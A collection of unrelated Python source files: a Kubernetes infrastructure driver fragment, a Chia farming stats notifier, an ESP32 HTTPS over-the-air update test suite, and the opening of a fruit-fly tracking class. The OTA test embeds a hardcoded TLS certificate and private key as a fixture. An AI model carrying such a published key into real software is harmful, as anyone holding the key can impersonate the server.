if request_type == 'CREATE':
failed = list(filter(lambda x: x['status'] == STATUS_FAILED, statuses))
if len(failed) > 0:
status = STATUS_FAILED
failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, failed[0].status_reason)
in_progress = list(filter(lambda x: x['status'] == STATUS_IN_PROGRESS, statuses))
if len(in_progress) > 0:
status = STATUS_IN_PROGRESS
return InfrastructureTask(infrastructure_id, infrastructure_id, status, failure_details, outputs)
elif request_type == 'DELETE':
failed = list(filter(lambda x: x['status'] == STATUS_FAILED, statuses))
in_progress = list(filter(lambda x: x['status'] == STATUS_IN_PROGRESS, statuses))
if len(failed) > 0:
status = STATUS_FAILED
failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, failed[0].status_reason)
elif len(in_progress) > 0 or len(statuses) > 0:
status = STATUS_IN_PROGRESS
return InfrastructureTask(infrastructure_id, infrastructure_id, status, failure_details, outputs)
else:
raise ValueError("Invalud request_type {0}".format(request_type))
def delete_infrastructure(self, infrastructure_id):
self.delete_pod_with_infrastructure_id(infrastructure_id)
self.delete_storage_with_infrastructure_id(infrastructure_id)
self.delete_networks_with_infrastructure_id(infrastructure_id)
def delete_pod_with_infrastructure_id(self, infrastructure_id):
v1 = self.coreV1Api()
pod_list = v1.list_namespaced_pod(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id))
logger.info('delete_pod_with_infrastructure_id {0}'.format(str(pod_list)))
if(len(pod_list.items)) > 0:
name = pod_list.items[0].metadata.name
logger.info('Deleting pod with name {0} in namespace {1}'.format(name, self.namespace()))
v1.delete_namespaced_pod(namespace=self.namespace(), name=name)
def delete_pod(self, name):
api_response = self.coreV1Api().delete_namespaced_pod(namespace=self.namespace(), name=name)
# capacity: 1Gb
def create_storage(self, name, capacity, storageClassName, infrastructure_id, properties):
v1 = self.coreV1Api()
logger.debug('storageClassName=' + storageClassName)
if(storageClassName == 'hostpath'):
hostpath = properties.get('hostpath', None)
if(hostpath is None):
raise ValueError("Hostpath property must be provided")
spec=client.V1PersistentVolumeSpec(
capacity={'storage': capacity},
access_modes=['ReadWriteOnce'],
host_path=client.V1HostPathVolumeSource(
path=hostpath,
type=''
))
storage = client.V1PersistentVolume(
api_version='v1',
kind='PersistentVolume',
metadata=client.V1ObjectMeta(name=name, labels={"infrastructure_id": infrastructure_id}),
spec=spec)
logger.debug("Creating storage %s" % str(storage))
api_response = v1.create_persistent_volume(storage)
logger.debug("Storage created. status='%s'" % str(api_response.status))
else:
# the storage provisioner will create the persistent volume in this case
pass
def get_storage(self, infrastructure_id):
v1 = self.coreV1Api()
storage_list = v1.list_persistent_volume(label_selector='infrastructure_id={}'.format(infrastructure_id))
if(len(storage_list.items)) > 0:
name = storage_list.items[0].metadata.name
return v1.read_persistent_volume(name=name)
else:
return None
def delete_networks_with_infrastructure_id(self, infrastructure_id):
customApi = self.customApi()
network_list = customApi.list_namespaced_custom_object(group="k8s.cni.cncf.io", version="v1", namespace=self.namespace(), plural="network-attachment-definitions", label_selector='infrastructure_id={}'.format(infrastructure_id), watch=False)
for network in network_list['items']:
print('Deleting network='+str(network))
# TODO handle errors
api_response = customApi.delete_namespaced_custom_object(group="k8s.cni.cncf.io", version="v1", namespace=self.namespace(), plural="network-attachment-definitions", name=network['metadata']['name'], body=V1DeleteOptions())
def delete_storage_with_infrastructure_id(self, infrastructure_id):
v1 = self.coreV1Api()
storage_list = v1.list_namespaced_persistent_volume_claim(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id))
for storage in storage_list.items:
# TODO handle errors
api_response = v1.delete_namespaced_persistent_volume_claim(namespace=self.namespace(), name=storage.metadata.name)
def delete_storage(self, name):
api_response = self.coreV1Api().delete_persistent_volume(name=name)
class DeploymentLocationTranslatorCapability(Capability):
@interface
def from_deployment_location(self, deployment_location):
pass
class K8sDeploymentLocationTranslator(Service, DeploymentLocationTranslatorCapability):
def __init__(self, k8s_properties, **kwargs):
self.dl_cache = DeploymentLocationCache()
self.k8s_properties = k8s_properties
if 'inf_messaging_service' not in kwargs:
raise ValueError('inf_messaging_service argument not provided')
self.inf_messaging_service = kwargs.get('inf_messaging_service')
def from_deployment_location(self, deployment_location):
dl_name = deployment_location.get('name', None)
if dl_name is None:
raise ValueError('Deployment Location managed by the K8s VIM Driver must have a name')
dl = self.dl_cache.get(dl_name)
if dl is None:
dl = K8sDeploymentLocation(deployment_location, self.k8s_properties, self.inf_messaging_service)
self.dl_cache.put(dl_name, dl)
return dl
|
stats_manager.py
|
# std
import logging
import os
from datetime import datetime, timedelta
from typing import List
from threading import Thread
from time import sleep
# project
from . import HarvesterActivityConsumer, FinishedSignageConsumer
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
try:
self._enable = config["enable"]
self._time_of_day = config["time_of_day"]
except KeyError as key:
logging.error(f"Invalid config.yaml. Missing key: {key}")
self._enable = False
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
FoundProofStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(f"Summary notifications will be sent out daily at {self._time_of_day} o'clock")
self._datetime_next_summary = datetime.now().replace(hour=self._time_of_day, minute=0, second=0, microsecond=0)
if datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(days=1)
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
machine_name = os.uname()[1]
summary = f"Hello farmer {machine_name}! 👋 Here's what happened in the last 24 hours:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(days=1)
sleep(1)
def stop(self):
self._is_running = False
|
example_test.py
|
import re
import os
import struct
import socket
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
import subprocess
try:
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
import http.server as BaseHTTPServer
from http.server import SimpleHTTPRequestHandler
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, "w+") as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, "server_key.pem")
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(["openssl", "s_server", "-WWW", "-key", key_file, "-cert", server_file, "-port", str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(SimpleHTTPRequestHandler):
def do_GET(self):
print("Sending resp, URL: " + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory("https://" + server_ip + ":" + str(redirection_port) + "/advanced_https_ota.bin")
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "rb+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "wb+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("Image validation failed, image is corrupted", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "rb+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "wb+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("advanced_https_ota_example: esp_https_ota_read_img_desc failed", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = "random.bin"
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "wb+")
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack("B", 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack("B", random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8070/" + bin_name))
dut1.write("https://" + host_ip + ":8070/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, "server_cert.pem"))
os.remove(os.path.join(dut1.app.binary_path, "server_key.pem"))
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
This is a positive test case, which starts a server and a redirection server.
Redirection server redirects http_request to different port
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Port to which the request should be redirecetd
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
thread2.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
|
fly_seg.py
|
#!/GPFS/zhangli_lab_permanent/zhuqingjie/env/py3_tf2/bin/python
'''
@Time : 20/07/21 下午 06:06
@Author : zhuqingjie
@User : zhu
@FileName: fly_seg.py
@Software: PyCharm
'''
import math
import random
import time
from pathlib import Path
import cv2
import numpy as np
from scipy import stats
from easyFlyTracker.src_code.Camera_Calibration import Undistortion
from easyFlyTracker.src_code.fly_angle import Fly_angle
from easyFlyTracker.src_code.gui_config import GUI_CFG
from easyFlyTracker.src_code.utils import Pbar, Wait
class FlySeg():
'''
计算视频中每个果蝇的运动轨迹
返回果蝇的坐标,当下列情况发生时返回异常坐标(-1,-1):
1,该果蝇不属于roi果蝇; ---> 该果蝇所有帧结果都为(-1,-1)
2,mask二值图像的连通区域小于2个(也就是说该帧果蝇分割失败) ---> 该果蝇个别帧为(-1,-1)
'''
__doc__ = 'flyseg'
def __init__(
self,
video_path, # 视频路径
output_dir, # 输出文件夹
save_txt_name, # 要保存的txt name(同时保存txt和同名npy),不要求绝对路径,只要求name即可
begin_time, # 从哪个时间点开始
# h_num, w_num, # 盘子是几乘几的
Undistortion_model_path=None, # 畸变矫正参数路径
duration_time=None, # 要持续多长时间
# dish_exclude=None, # 排除的特殊圆盘,比如空盘、死果蝇等情况,可以一维或者(h_num, w_num),被排除的圆盘结果用(-1,-1)表示
seg_th=120, # 分割阈值
background_th=70, # 跟背景差的阈值
area_th=0.5, # 内圈面积阈值
# minR_maxR_minD=(40, 50, 90), # 霍夫检测圆时的参数,最小半径,最大半径,最小距离
skip_config=False,
):
# 初始化各种文件夹
self.video_path = Path(video_path)
self.output_dir = Path(output_dir)
self.saved_dir = Path(self.output_dir, '.cache') # 中间结果文件夹
# 因为加畸变矫正跟不加畸变矫正背景图像不一样,所以用两个文件名来区分
if Undistortion_model_path:
self.bg_img_path = Path(self.saved_dir, 'background_image_undistort.bmp')
else:
self.bg_img_path = Path(self.saved_dir, 'background_image.bmp')
self.res_txt_path = Path(self.output_dir, save_txt_name) # txt结果给用户看,所以保存到用户文件夹
self.res_npy_path = Path(self.saved_dir, f'{save_txt_name[:-3]}npy')
self.heatmap_path = Path(self.saved_dir, f'heatmap.npy')
self.fly_angles_path = Path(self.saved_dir, f'fly_angles.npy')
self.saved_dir.mkdir(exist_ok=True)
self.video_stem = str(Path(video_path).stem)
self.seg_th = seg_th
self.undistort = Undistortion(Undistortion_model_path)
self.background_th = background_th
self.video = cv2.VideoCapture(str(self.video_path))
